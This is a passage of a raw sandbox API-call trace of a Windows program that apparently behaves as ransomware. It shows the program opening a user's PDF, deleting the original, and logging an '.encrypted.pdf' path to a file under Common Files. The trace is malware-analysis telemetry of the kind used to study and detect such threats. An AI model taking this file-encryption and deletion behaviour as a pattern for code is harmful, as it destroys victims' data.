ftLastWriteTime.dwLowDateTime=0xc3020f10, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 0x7c2100 [0034.730] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0034.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.730] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.730] CharLowerBuffW (in: lpsz="byte[31086]", cchLength=0xb | out: lpsz="byte[31086]") returned 0xb [0034.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.731] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.731] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.731] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.731] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.731] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.732] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.732] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.733] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\oy9qr-e1terui8x.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0034.733] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.733] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.733] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.733] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.733] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.733] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.734] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.734] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.734] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.734] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.734] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpFilePart=0x0) returned 0x78 [0034.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0x149754c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 0x7c2100 [0034.734] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\oy9qr-e1terui8x.pdf")) returned 1 [0034.736] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0x149754c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 0 [0034.736] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.736] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.736] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.736] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.736] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.737] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.737] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.737] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.737] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.737] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0034.737] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.737] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.737] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.737] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.737] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.738] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.738] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x171c, lpOverlapped=0x0) returned 1 [0034.738] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.738] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x171c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.738] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.encrypted.pdf\r\n", cchWideChar=133, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 133 [0034.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x85) returned 0x7bbc00 [0034.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.encrypted.pdf\r\n", cchWideChar=133, lpMultiByteStr=0x7bbc00, cbMultiByte=133, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.encrypted.pdf\r\n", lpUsedDefaultChar=0x0) returned 133 [0034.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0034.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0034.738] WriteFile (in: hFile=0x140, lpBuffer=0x7c38b0*, nNumberOfBytesToWrite=0x84, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7c38b0*, lpNumberOfBytesWritten=0x6aee3c*=0x84, lpOverlapped=0x0) returned 1 [0034.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0034.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.739] CloseHandle (hObject=0x140) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.048] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.048] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, 